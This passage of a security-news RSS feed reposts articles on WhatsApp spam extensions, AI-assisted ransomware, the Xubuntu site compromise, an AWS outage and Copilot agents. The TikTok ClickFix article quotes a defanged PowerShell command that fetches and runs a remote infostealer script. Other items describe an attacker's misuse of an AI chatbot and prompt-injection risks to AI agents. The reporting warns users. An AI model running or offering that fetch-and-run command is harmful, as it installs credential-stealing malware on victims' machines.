	On Thursday, Microsoft <a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-windows-bug-breaking-localhost-http-connections/" rel="external nofollow" target="_blank">fixed another known issue</a> breaking IIS websites and HTTP/2 localhost (127.0.0.1) connections after installing recent Windows security updates.
</p>

<p>
	 
</p>

<p>
	The same day, the company also <a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-lifts-more-safeguard-holds-blocking-windows-11-updates/" rel="external nofollow" target="_blank">removed two compatibility holds</a> preventing users from upgrading their systems to Windows 11 24H2 via Windows Update.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-october-security-updates-cause-windows-smart-card-auth-issues/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">

<p>
	<span style="font-size:12px;"><em>Posted Tuesday 21 October 2025 at 3:57 am AEST (my time).</em></span>
</p>

]]></description><guid isPermaLink="false">31985</guid><pubDate>Mon, 20 Oct 2025 17:58:09 +0000</pubDate></item><item><title>131 Chrome Extensions Caught Hijacking WhatsApp Web for Massive Spam Campaign</title><link>https://nsaneforums.com/news/security-privacy-news/131-chrome-extensions-caught-hijacking-whatsapp-web-for-massive-spam-campaign-r31982/</link><description><![CDATA[<p>
	Cybersecurity researchers have uncovered a coordinated campaign that leveraged 131 rebranded clones of a WhatsApp Web automation extension for Google Chrome to spam Brazilian users at scale.
</p>

<p>
	 
</p>

<p>
	The 131 spamware extensions share the same codebase, design patterns, and infrastructure, according to supply chain security company Socket. The browser add-ons collectively have about 20,905 active users.
</p>

<p>
	 
</p>

<p>
	"They are not classic malware, but they function as high-risk spam automation that abuses platform rules," security researcher Kirill Boychenko said. "The code injects directly into the WhatsApp Web page, running alongside WhatsApp's own scripts, automates bulk outreach and scheduling in ways that aim to bypass WhatsApp's anti-spam enforcement."
</p>

<p>
	 
</p>

<p>
	The end goal of the campaign is to blast outbound messaging via WhatsApp in a manner that bypasses the messaging platform's rate limits and anti-spam controls.
</p>

<p>
	 
</p>

<p>
	The activity is assessed to have been ongoing for at least nine months, with new uploads and version updates to the extensions observed as recently as October 17, 2025. Some of the identified extensions are listed below:
</p>

<p>
	 
</p>

<ul>
	<li>
		    YouSeller (10,000 users)
	</li>
	<li>
		    performancemais (239 users)
	</li>
	<li>
		    Botflow (38 users)
	</li>
	<li>
		    ZapVende (32 users)
	</li>
</ul>

<p>
	 
</p>

<p>
	The extensions have been found to embrace different names and logos, but, behind the scenes, the vast majority of them have been published by "WL Extensão" and its variant "WLExtensao." It's believed that the differences in branding are the result of a franchise model that allows the operation's affiliates to flood the Chrome Web Store with various clones of the original extension offered by a company named DBX Tecnologia.
</p>

<p>
	 
</p>

<p>
	These add-ons also masquerade as customer relationship management (CRM) tools for WhatsApp, claiming to allow users to maximize their sales through the web version of the application.
</p>

<p>
	 
</p>

<p>
	"Turn your WhatsApp into a powerful sales and contact management tool. With Zap Vende, you'll have an intuitive CRM, message automation, bulk messaging, visual sales funnel, and much more," reads the description of ZapVende on the Chrome Web Store. "Organize your customer service, track leads, and schedule messages in a practical and efficient way."
</p>

<p>
	 
</p>

<p>
	DBX Tecnologia, per Socket, advertises a reseller white-label program to allow prospective partners to rebrand and sell its WhatsApp Web extension under their own brand, promising recurring revenue in the range of R$30,000 to R$84,000 by investing R$12,000.
</p>

<p>
	 
</p>

<p>
	It's worth noting that the practice is in violation of Google's Chrome Web Store Spam and Abuse policy, which bans developers and their affiliates from submitting multiple extensions that provide duplicate functionality on the platform. DBX Tecnologia has also been found to have put out YouTube videos about bypassing WhatsApp's anti-spam algorithms when using the extensions.
</p>

<p>
	"The cluster consists of near-identical copies spread across publisher accounts, is marketed for bulk unsolicited outreach, and automates message sending inside web.whatsapp.com without user confirmation," Boychenko noted. "The goal is to keep bulk campaigns running while evading anti-spam systems."
</p>

<p>
	 
</p>

<p>
	The disclosure comes as Trend Micro, Sophos, and Kaspersky shed light on a large-scale campaign that's targeting Brazilian users with a WhatsApp worm dubbed SORVEPOTEL that's used to distribute a banking trojan codenamed Maverick.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2025/10/131-chrome-extensions-caught-hijacking.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">31982</guid><pubDate>Mon, 20 Oct 2025 13:28:15 +0000</pubDate></item><item><title>AI in Ransomware Attacks: How Big is the Risk?</title><link>https://nsaneforums.com/news/security-privacy-news/ai-in-ransomware-attacks-how-big-is-the-risk-r31981/</link><description><![CDATA[<p>
	 
</p>

<p>
	<em><span style="font-size:18px;">Recent reports claim to showcase AI-powered ransomware. But how big is the risk to businesses?</span></em>
</p>

<p>
	 
</p>

<p>
	Beyond ransomware-as-a-service, AI is making ransomware more available to cybercriminals with limited abilities. Anthropic reported that an adversary used the Claude chatbot for recon, code generation and credential theft against 17 organisations, including healthcare providers, government agencies and a defence contractor.
</p>

<p>
	 
</p>

<p>
	Meanwhile, cybersecurity firm ESET demonstrated a proof of concept showing what researchers call the first AI-powered ransomware.
</p>

<p>
	 
</p>

<p>
	Ransomware is bad enough on its own, with the malware now present in 44% of all breaches, according to Verizon’s 2025 Data Breach Investigations Report. So, how will AI technology affect the ransomware market? And are researchers’ predictions an indicator of what’s to come?
</p>

<p>
	 
</p>

<p>
	<strong>AI-Powered Ransomware</strong>
</p>

<p>
	 
</p>

<p>
	The technology is supercharging attacker capabilities, but not all cybersecurity experts are convinced of the risk from AI-powered ransomware. Rik Ferguson, VP of security intelligence at Forescout and cybersecurity industry veteran, says the “loud AI-powered ransomware” headlines are “mostly hyperbole”.
</p>

<p>
	 
</p>

<p>
	Recent reports highlighting instances of AI-powered ransomware involved malware samples embedded with AI prompts capable of executing script commands for file discovery and encryption. However, they were not examples of real-world attacks, Robert McArdle, director of forward threat research at Trend Micro, points out.
</p>

<p>
	 
</p>

<p>
	Instead, they originated from academic research and were uploaded to public repositories such as VirusTotal, where they were identified, he says.
</p>

<p>
	 
</p>

<p>
	And in fact, rather than offering an easy means to attack, the idea of AI-integrated ransomware actually presents several drawbacks for criminals using it, says McArdle. “Such malware is typically easier to detect and often relies on connections to cloud-based AI services, introducing additional risks. Threat actors must then evade detection from traditional security vendors, as well as from the security teams of large language model providers.”
</p>

<p>
	 
</p>

<p>
	The real criminal operational improvements today are in the back-end, says Ferguson. “This is where AI sharpens target selection, personalises phishing at scale and dynamically tunes campaigns to raise conversion rates without raising flags.”
</p>

<p>
	 
</p>

<p>
	Taking this into account, Anthropic’s latest misuse report is the better compass of how adversaries are using AI in ransomware attacks, says Ferguson. “One adversary used Claude to automate reconnaissance, assist credential theft, triage targets and draft ransom notes, leaning on leak-based extortion rather than encryption. That’s the operational reality to plan for.”
</p>

<p>
	 
</p>

<p>
	<strong>The Real Risk of AI </strong>
</p>

<p>
	 
</p>

<p>
	As the area develops, experts agree that AI will play a role in a number of areas of the ransomware market. One is in the post-exfiltration phase of the ransomware kill chain, specifically in the monetisation of stolen data, says McArdle.
</p>

<p>
	 
</p>

<p>
	He describes a development in late August on the RAMP4U forum, where the Dragonforce ransomware group announced a new data analysis service. “This leverages AI to process stolen data and produce tailored outputs designed to increase pressure on victims.”
</p>

<p>
	 
</p>

<p>
	As large language models become more capable and accessible, attackers will move beyond using AI as a tool and start embedding it directly into their operations, Dan Jones, senior security advisor at Tanium, tells SC Media UK.
</p>

<p>
	 
</p>

<p>
	This can range from adaptive reconnaissance to malware that learns from its environment, Jones says. He thinks ransomware strains will evolve to “negotiate, pivot and persist without the hacker needing to intervene”.
</p>

<p>
	 
</p>

<p>
	Looking ahead, AI-powered ransomware is likely to become more “autonomous, adaptive, and stealthy”, agrees Steve Sandford, partner, digital forensics and incident response at Cyxcel. “Future variants may use reinforcement learning to optimise attack paths or integrate deepfake technology to impersonate executives and manipulate victims.”
</p>

<p>
	 
</p>

<p>
	<strong>Magic Malware</strong>
</p>

<p>
	 
</p>

<p>
	The addition of AI to ransomware operations means firms need to be on their guard. But the threat is not that large, at least not yet.
</p>

<p>
	 
</p>

<p>
	Over the next year, expect AI to keep supercharging operations, not to create magic malware, says Ferguson. “Think dynamic victim profiling, adaptive phishing, faster privilege escalation, automated leak-site curation and tailored pressure campaigns.”
</p>

<p>
	 
</p>

<p>
	On the code side, he suggests more local models could be used to dodge provider guardrails. “But the measurable improvement for criminals will remain in scale and speed rather than novel exploits or attack chains.”
</p>

<p>
	 
</p>

<p>
	While generative AI is driving industry discourse, the most transformative impact is likely to come from agentic AI, says McArdle. “This does not rely on a single, all-powerful system, but on a network of specialised agents, each designed to perform a specific task. These agents are orchestrated by a central AI coordinator or digital assistant, which manages workflows, retains memory of past actions, and continuously learns to optimise performance.”
</p>

<p>
	 
</p>

<p>
	He thinks the adoption of agentic AI has the potential to move beyond the model of “cybercrime-as-a-service” to what he labels “cybercrime-as-a-servant”. This would enable criminals to “delegate complex operations to AI systems with minimal oversight”, he says.
</p>

<p>
	 
</p>

<p>
	For now, there are some simple steps firms can take to mitigate the threat. The right response isn’t to “panic” or “chase the next shiny security tool”, says Adam Seamons, head of information security at GRC International Group. “It’s about doing the basics properly, using strong identity controls, tested backups, behaviour-based detection, and people who trust their instincts when something seems wrong. In short, assume the attackers are using automation, and make sure you’re keeping up.”
</p>

<p>
	 
</p>

<p>
	And while the emergence of AI-powered ransomware might introduce new dimensions to cyber threats, it remains, at its core, a form of ransomware, McArdle points out. Therefore, he says, “established best practices for defending against attacks continue to be applicable”.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://insight.scmagazineuk.com/ai-in-ransomware-attacks-how-big-is-the-risk" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">31981</guid><pubDate>Mon, 20 Oct 2025 13:20:44 +0000</pubDate></item><item><title>Microsoft Issues Final Windows 10 Update, Leaving 400 Million Users At Risk</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-issues-final-windows-10-update-leaving-400-million-users-at-risk-r31980/</link><description><![CDATA[<p>
	The latest Windows 10 update, KB5066791, is here. It patches some bugs but is mostly aimed at enterprise customers. So what makes it special, you might ask? It stands out because, unless you sign up to Microsoft’s Extended Security Updates, it’s the last Windows 10 update you’ll ever see. 
</p>

<p>
	 
</p>

<p>
	That’s important because it means that your Windows 10 computer will gradually become less secure. 
</p>

<p>
	 
</p>

<p>
	“Microsoft does not warn that it’s the last update, but it does show a small nudge to sign up for Extended Security Updates,” Windows Latest reports.
</p>

<p>
	 
</p>

<p>
	So, what should you do to keep your PC secure?
</p>

<p>
	 
</p>

<p>
	First up, if you think you would like Windows 11 after all, it’s free to upgrade to it — and there are plenty of nudges from Microsoft to do that.
</p>

<p>
	 
</p>

<p>
	But what if your PC isn’t capable of running Windows 11? This is something you can check. Microsoft explained what to do in a recent support document: “To check if your PC is eligible for the free upgrade go to Start &gt; Settings &gt; Update &amp; Security &gt; Windows Update and select Check for updates,” it said.
</p>

<p>
	 
</p>

<p>
	But what if you like Windows 10, thank you very much, and don’t want to move to the next OS? There are hundreds of millions of users who haven’t chosen to move to Windows 11, by the way.
</p>

<p>
	 
</p>

<p>
	In that case, you have the ESU option. This will provide security updates for almost a year, until Oct. 14, 2026. Microsoft really does want you on Windows 11 after that, but you have 12 months’ grace to, as the company puts it, prepare for the transition to Windows 11.
</p>

<p>
	 
</p>

<p>
	To sign up to ESU costs $30, but you can choose to redeem 1,000 Microsoft Rewards points instead of paying cash. Even better, the $30 fee is waived, making it a free option, if you agree to sync your PC settings.
</p>

<p>
	 
</p>

<p>
	To sign up for this, go to Settings, then choose Update &amp; Security and Windows Update. If your device meets the prerequisites, click on the link marked Enroll now and sign in with your Microsoft account.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.forbes.com/sites/davidphelan/2025/10/20/microsoft-issues-final-windows-10-update-leaving-400-million-users-at-risk/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">31980</guid><pubDate>Mon, 20 Oct 2025 13:11:50 +0000</pubDate></item><item><title>Xubuntu website compromised to deliver crypto malware to Windows 10 refugees</title><link>https://nsaneforums.com/news/security-privacy-news/xubuntu-website-compromised-to-deliver-crypto-malware-to-windows-10-refugees-r31979/</link><description><![CDATA[<p>
	You are probably aware, if you have been reading Neowin in recent weeks, that Windows 10 reached end of life on October 14.
</p>

<p>
	 
</p>

<p>
	For those people not able to upgrade to Windows 11, due to insufficient hardware, a popular choice has been to switch to Linux, and hackers know this. Well, over the weekend, the website of Xubuntu, an Ubuntu spin, was compromised to serve Windows malware.
</p>

<p>
	 
</p>

<p>
	According to OMG! Ubuntu, the malware was being served in the ironically-named file xubuntu-safe-download.zip, which was being downloaded by users who tried to download the official .torrent file. If you didn’t download the torrent, you should be fine.
</p>

<p>
	 
</p>

<p>
	Inside the zip file was a Windows .exe runtime which contained the malware and a terms of service text file. While this wouldn’t have tricked an experienced user, who knows they’re looking for an .ISO or .IMG file, a Linux novice who has never left Windows might not realize this and click the .exe, getting their machine infected.
</p>

<p>
	 
</p>

<p>
	The malware itself was designed to intercept links for cryptocurrency accounts copied to the clipboard, probably in an attempt to clear users out of their savings. As cryptocurrency is largely unregulated, it’s much harder to get your assets back when compared to money being taken from your bank account.
</p>

<p>
	 
</p>

<p>
	Once the team learned about what happened, they took down the affected download page immediately so others wouldn’t be able to infect their PC. The project said that it is expediting static site development to replace the aging WordPress instance.
</p>

<p>
	 
</p>

<p>
	While this sucks for the credibility of the Xubuntu project, users should be fully aware the compromise was very limited. No other flavours of Ubuntu, the Ubuntu infrastructure, or direct Xubuntu ISO downloads were compromised. Also, if you are running Xubuntu, there is no need to worry as this attack doesn’t affect you.
</p>

<p>
	 
</p>

<p>
	While the Xubuntu team works on the new website, you’ll need to head here <a href="https://cdimage.ubuntu.com/xubuntu/releases/" rel="external nofollow">https://cdimage.ubuntu.com/xubuntu/releases/</a> to download Xubuntu, which is safe to do.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.neowin.net/news/xubuntu-website-compromised-to-deliver-crypto-malware-to-windows-10-refugees/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">31979</guid><pubDate>Mon, 20 Oct 2025 13:08:45 +0000</pubDate></item><item><title>Amazon Disruption Forces Hundreds of Websites Offline for Hours</title><link>https://nsaneforums.com/news/security-privacy-news/amazon-disruption-forces-hundreds-of-websites-offline-for-hours-r31975/</link><description><![CDATA[<p>
	Amazon Web Services, a major provider of cloud services, said most services were back up. Hulu, Snapchat, McDonald’s and the British government’s official site were among those that reported outages.
</p>

<p>
	 
</p>

<p>
	A disruption involving Amazon Web Services, the cloud service provider that powers much of the internet, took many websites and apps offline for over two hours on Monday, in the latest outage that showed the fragility of the global technology infrastructure.
</p>

<p>
	 
</p>

<p>
	The disruption affected websites and apps for some major banks, gaming sites and entertainment services starting shortly after 3 a.m. Eastern. Amazon said in an update at 5:27 a.m. that most websites and apps relying on its services were working normally again, and that it continued “to work through a backlog of queued requests.”
</p>

<p>
	 
</p>

<p>
	Major services were affected, including WhatsApp, the British government’s website and government tax services, the payment app Venmo, the cryptocurrency platform Coinbase and games at The New York Times. Dozens of other companies and retailers — including Amazon, Venmo, Hulu, Snapchat, Ring doorbells and McDonald’s — also experienced service interruptions.
</p>

<p>
	 
</p>

<p>
	It was not immediately clear what led to the outage, and there were no indications that it had been caused by a cyberattack.
</p>

<p>
	 
</p>

<p>
	Experts said that the disruption showed again how the internet’s reliance on a few major technology providers — including Amazon, Microsoft and Google — can affect millions of users when one service breaks down. Last year, a much wider, daylong internet outage was caused by a faulty update sent out by a little known cybersecurity company called CrowdStrike.
</p>

<p>
	 
</p>

<p>
	Amazon Web Services counts thousands of clients who rely on it for complex, demanding, data-intensive operations including streaming video, running web applications and storing huge amounts of digital information. Amazon’s cloud-computing division has set up infrastructure all around the world, allowing companies to make their products accessible to customers across the globe. By renting the service, clients can scale up or down without having to invest in otherwise costly hardware.
</p>

<p>
	 
</p>

<p>
	In its initial statement on the outage, Amazon said early Monday that 28 of its services, including those in the “US-EAST-1” region, were having issues and that its engineers had been working on limiting the effects and identifying the cause.
</p>

<p>
	 
</p>

<p>
	Rob Jardin, the chief digital officer at NymVPN, a virtual private network service, said that early indications were that the outage may have been caused by a technical fault affecting one of Amazon’s main data centers.
</p>

<p>
	 
</p>

<p>
	“Outages of this scale expose our overreliance on centralized infrastructures,” he said in a statement. “The internet was originally designed to be decentralized and resilient, yet today so much of our online ecosystem is concentrated in a small number of cloud regions.”
</p>

<p>
	Some media advocates said that the outage, which caused disruptions to secure communications apps such as Signal and other digital tools, showed how the internet’s reliance on a few major technology companies posed a risk to free speech.
</p>

<p>
	 
</p>

<p>
	“When a single provider goes dark, critical services go offline with it,” Corinne Cath-Speth, head of digital for Article 19, a free speech advocacy group, said in a statement. She added that there was an urgent need for diversification in cloud computing. “The infrastructure underpinning democratic discourse, independent journalism and secure communications cannot be dependent on a handful of companies.”
</p>

<p>
	 
</p>

<p>
	Still, Amazon’s share price barely moved in premarket trading, suggesting that investors were not too bothered about the outage. In the first half of the year, Amazon Web Services accounted for nearly 20 percent of Amazon’s sales, but about 60 percent of its operating profit.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.nytimes.com/2025/10/20/business/aws-down-internet-outage.html" rel="external nofollow">Source</a></strong>
</p>

<p>
	 
</p>

<p>
	<em>Also: <a href="https://www.bbc.com/news/live/c5y8k7k6v1rt" rel="external nofollow">Live: Amazon services showing 'signs of recovery' after Snapchat and banks among sites hit by major outage</a></em>
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/technology/aws-outage-crashes-amazon-primevideo-fortnite-perplexity-and-more/" rel="external nofollow">AWS outage crashes Amazon, PrimeVideo, Fortnite, Perplexity and more</a>
</p>
]]></description><guid isPermaLink="false">31975</guid><pubDate>Mon, 20 Oct 2025 12:28:24 +0000</pubDate></item><item><title>TikTok videos continue to push infostealers in ClickFix attacks</title><link>https://nsaneforums.com/news/security-privacy-news/tiktok-videos-continue-to-push-infostealers-in-clickfix-attacks-r31973/</link><description><![CDATA[<p>
	Cybercriminals are using TikTok videos disguised as free activation guides for popular software like Windows, Spotify, and Netflix to spread information-stealing malware.
</p>

<p>
	 
</p>

<p>
	ISC Handler Xavier Mertens spotted the ongoing campaign, which is largely the same as the one <a href="https://www.bleepingcomputer.com/news/security/tiktok-videos-now-push-infostealer-malware-in-clickfix-attacks/" rel="external nofollow" target="_blank">observed by Trend Micro</a> in May.
</p>

<p>
	 
</p>

<p>
	The TikTok videos seen by BleepingComputer pretend to offer instructions on how to activate legitimate products like Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro, and Discord Nitro, as well as made-up services such as Netflix and Spotify Premium.
</p>

<div style="">
	<figure class="image" style="display:inline-block">
		<img alt="tiktok-videos.jpg" class="ipsImage" height="714" width="720" src="https://www.bleepstatic.com/images/news/security/t/tiktok/infostealers/tiktok-videos.jpg">
		<figcaption>
			<em>Malicious videos on TikTok pushing infostealers<br>
			Source: BleepingComputer.com</em>
		</figcaption>
	</figure>
</div>

<p>
	The videos are performing a ClickFix attack, which is a social engineering technique that provides what appears to be legitimate "fixes" or instructions that trick users into executing malicious PowerShell commands or other scripts that infect their computers with malware.
</p>

<p>
	 
</p>

<p>
	Each video displays a short one-line command and tells viewers to run it as an administrator in PowerShell:
</p>

<pre style="margin-left: 40px;"><code>iex (irm slmgr[.]win/photoshop)</code></pre>

<p>
	It should be noted that the program name in the URL is different depending on the program that is being impersonated. For example, in the fake Windows activation videos, instead of the URL containing <em>photoshop</em>, it would include <em>windows</em>.
</p>

<p>
	 
</p>

<p>
	In this campaign, when the command is executed, PowerShell connects to the remote site slmgr[.]win to retrieve and execute another PowerShell script.
</p>

<p>
	 
</p>

<p>
	This script downloads two executables from Cloudflare pages, with the first executable downloaded from https://file-epq[.]pages[.]dev/updater.exe [<a href="https://www.virustotal.com/gui/file/58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8" rel="external nofollow" target="_blank">VirusTotal</a>]. This executable is a variant of the Aura Stealer info-stealing malware.
</p>

<p>
	 
</p>

<p>
	Aura Stealer collects saved credentials from browsers, authentication cookies, cryptocurrency wallets, and credentials from other applications and uploads them to the attackers, giving them access to your accounts.
</p>

<p>
	 
</p>

<p>
	Mertens says that an additional payload will be downloaded, named source.exe [<a href="https://www.virustotal.com/gui/file/db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011" rel="external nofollow" target="_blank">VirusTotal</a>], which is used to self-compile code using .NET's built-in Visual C# Compiler (csc.exe). This code is then injected and launched in memory.
</p>

<p>
	 
</p>

<p>
	The purpose of the additional payload remains unclear.
</p>

<p>
	 
</p>

<p>
	Users who perform these steps should consider all of their credentials compromised and immediately reset their passwords on all sites they visit.
</p>

<p>
	 
</p>

<p>
	ClickFix attacks have become very popular over the past year, used to distribute various malware strains in ransomware and cryptocurrency theft campaigns.
</p>

<p>
	 
</p>

<p>
	As a general rule, users should never copy text from a website and run it in an operating system dialog box, including within the <a href="https://www.bleepingcomputer.com/news/security/filefix-attack-weaponizes-windows-file-explorer-for-stealthy-powershell-commands/" rel="external nofollow" target="_blank">File Explorer address bar</a>, command prompt, PowerShell prompts, macOS terminal, and Linux shells.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/tiktok-videos-continue-to-push-infostealers-in-clickfix-attacks/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post. Feedback welcome.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Monday 20 October 2025 at 12:15 pm AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of September): 4,533</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a></span></strong>
</p>
]]></description><guid isPermaLink="false">31973</guid><pubDate>Mon, 20 Oct 2025 02:16:12 +0000</pubDate></item><item><title>Windows 11 AI agents will act on your behalf - how much can you trust them?</title><link>https://nsaneforums.com/news/security-privacy-news/windows-11-ai-agents-will-act-on-your-behalf-how-much-can-you-trust-them-r31964/</link><description><![CDATA[<p>
	<span style="font-size:18px;"><strong>Should you trust this Copilot agent to poke around your files and interact with apps? The last time Microsoft rolled out a major AI feature, it didn't go well. </strong></span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:18px;"><strong>ZDNET's key takeaways</strong></span>
</p>

<p>
	 
</p>

<ul>
	<li>
		Windows 11 is adding AI agents that can take actions on your behalf.
	</li>
	<li>
		Copilot agents represent potential security and privacy risks.
	</li>
	<li>
		Expect testing and more security controls before the feature goes public.
	</li>
</ul>

<p>
	 
</p>

<p>
	Every computer security decision ultimately comes down to a question of trust. Should you install this program you're about to download from an unfamiliar website? Are you certain that your email messages are going directly to their recipient without being intercepted? Is it safe to provide that merchant with your credit card details?
</p>

<p>
	 
</p>

<p>
	Soon, owners of PCs running Windows 11 will have another question to add to that list: Should you trust this Copilot agent to poke around in your files and interact with apps on your behalf?
</p>

<p>
	 
</p>

<p>
	Here's how Microsoft describes the Copilot Actions feature, which is rolling out for testing by members of the Windows Insider Program:
</p>

<p>
	 
</p>

<p style="margin-left:40px;">
	<strong>Copilot Actions is an AI agent that completes tasks for you by interacting with your apps and files, using vision and advanced reasoning to click, type, and scroll like a human would.</strong>
</p>

<p style="margin-left:40px;">
	 
</p>

<p style="margin-left:40px;">
	<strong>This transforms agents from passive assistants into active digital collaborators that can carry out complex tasks for you to enhance efficiency and productivity -- like updating documents, organizing files, booking tickets, or sending emails. After you've granted the agent access, when integrated with Windows, the agent can take advantage of what you already have on your PC, like your apps and data, to complete tasks for you.</strong>
</p>

<p>
	 
</p>

<p>
	These are pretty big trust decisions. Allowing an agent to interact with your personal files requires a leap of faith. So does the idea of letting an agent act on your behalf in apps -- where, presumably, you are signed in using some sort of secure credentials.
</p>

<p>
	 
</p>

<p>
	<span style="font-size:20px;"><strong>Learning from the past</strong></span>
</p>

<p>
	 
</p>

<p>
	The last time Microsoft rolled out a major AI feature with this level of access to your personal data, it ... didn't go well. The Windows Recall feature was slammed by security researchers, delayed for months, and finally relaunched with major privacy and security changes. Ultimately, it was nearly a year before the feature made it to public builds.
</p>

<p>
	 
</p>

<p>
	This time around, Microsoft is taking no such chances. In a pair of on-the-record briefings ahead of the public debut of the Copilot Actions feature, executives at the company went to great pains to emphasize its commitment to privacy and security controls.
</p>

<p>
	 
</p>

<p>
	For starters, the feature is rolling out as a preview, in "experimental mode," exclusively for customers who've opted into the Windows Insider Program for pre-release builds of Windows.
</p>

<p>
	 
</p>

<p>
	The feature is disabled by default and only enabled when the user flips the "Experimental agentic features" switch in Windows Settings &gt; System &gt; AI components &gt; Agent tools.
</p>

<p>
	 
</p>

<p>
	Agents that integrate with Windows must be digitally signed by a trusted source, much as executable apps are. That precaution should make it possible to revoke and block malicious agents.
</p>

<p>
	 
</p>

<p>
	Agents will run under a separate standard account that is only provisioned when the user enables the feature. For now, at least, the agent account will have access to a limited set of so-called known folders in the logged-on user's profile -- including Documents, Downloads, Desktop, and Pictures. The user needs to explicitly grant permission to access files in other locations.
</p>

<p>
	 
</p>

<p>
	All of those actions will happen in a contained environment called the Agent workspace, with its own desktop and only limited access to the user's desktop. In principle, this kind of runtime isolation and granular control over permissions is similar to existing features like the Windows Sandbox.
</p>

<p>
	 
</p>

<p>
	In a blog post highlighting these security features, Dana Huang, corporate vice president, Windows Security, said, "[A]n agent will start with limited permissions and will only obtain access to resources you explicitly provide permission to, like your local files. There is a well-defined boundary for the agent's actions, and it has no ability to make changes to your device without your intervention. This access can be revoked at any time."
</p>

<p>
	 
</p>

<p>
	The security stakes for this kind of feature are high. As Huang noted, "[A]gentic AI applications introduce novel security risks, such as cross-prompt injection (XPIA), where malicious content embedded in UI elements or documents can override agent instructions, leading to unintended actions like data exfiltration or malware installation." And, of course, there's always the risk that an AI-powered agent will confidently perform the wrong action.
</p>

<p>
	 
</p>

<p>
	In an interview, Microsoft's Peter Waxman confirmed that the company's security researchers are actively "red-teaming" the Copilot Actions feature, although he declined to discuss any specific scenarios that they've tested.
</p>

<p>
	 
</p>

<p>
	Microsoft said the feature will be evolving continuously during the experimental preview period, with "more granular security and privacy controls" arriving before the features are released to the public.
</p>

<p>
	 
</p>

<p>
	Will those caveats and disclaimers be sufficient to satisfy the notoriously skeptical community of security researchers? We're about to find out.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.zdnet.com/article/windows-11-ai-agents-will-act-on-your-behalf-how-much-can-you-trust-them/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">31964</guid><pubDate>Sun, 19 Oct 2025 15:41:22 +0000</pubDate></item><item><title>Google has killed Privacy Sandbox</title><link>https://nsaneforums.com/news/security-privacy-news/google-has-killed-privacy-sandbox-r31952/</link><description><![CDATA[<p>
	Google's Privacy Sandbox is officially dead. In an update on the project's website, Google Vice President Anthony Chavez has announced that the company was sunsetting the remaining technologies developed for Sandbox due to their "low levels of adoption." A spokesperson has confirmed to AdWeek that Google isn't just killing those technologies, it's retiring the whole initiative altogether. "We will be continuing our work to improve privacy across Chrome, Android and the web, but moving away from the Privacy Sandbox branding," the spokesperson said. "We're grateful to everyone who contributed to this initiative, and will continue to collaborate with the industry to develop and advance platform technologies that help support a healthy and thriving web."
</p>

<p>
	 
</p>

<p>
	The company launched Privacy Sandbox in 2019 as a future replacement to third-party cookies. It's a set of open standards that are supposed to enable personalized ads without divulging identifying data. Over the years, Google's plans to deprecate third-party cookies got pushed back again and again due to a series of delays and regulatory hurdles. Specifically, both the UK's Competition and Markets Authority (CMA) and the US Department of Justice looked into the Privacy Sandbox out of concerns that it could harm smaller advertisers.
</p>

<p>
	 
</p>

<p>
	In 2024, Google ultimately decided not to kill third-party cookies in Chrome and instead chose to roll out "a new experience in Chrome that lets people make an informed choice that applies across their web browsing." Just this April, Google announced that it wasn't going to make any changes to how third-party cookies work on the Chrome browser at all, and that it was going to "maintain [its] current approach to offering users third-party cookie choice in Chrome." At the time, the company said that it was going to keep the Privacy Sandbox initiative alive, but things have clearly changed since then. Chavez wrote in the latest update that Google will "continue to utilize learnings from the retired Privacy Sandbox technologies."
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.engadget.com/cybersecurity/google-has-killed-privacy-sandbox-130029899.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">31952</guid><pubDate>Sat, 18 Oct 2025 13:12:59 +0000</pubDate></item><item><title>&#x201C;I saw numerous records marked as confidential&#x201D; &#x2014; 40 billion unencrypted files spilled by a marketing firm that never expected you to look</title><link>https://nsaneforums.com/news/security-privacy-news/%E2%80%9Ci-saw-numerous-records-marked-as-confidential%E2%80%9D-%E2%80%94-40-billion-unencrypted-files-spilled-by-a-marketing-firm-that-never-expected-you-to-look-r31942/</link><description><![CDATA[<h3>
	Another day, another data leak. This time it’s 13TB and 40 billion records — courtesy of Netcore.
</h3>

<p id="e62b5aee-1fa3-4f87-ba51-540c8130ce2c">
	It's 2025, and your data still isn't safe in the hands of corporations that should know a lot better than to store it in an unencrypted database. And yet, stories like these continue to send shivers down the spines of cybersecurity experts everywhere.
</p>

<p>
	 
</p>

<p>
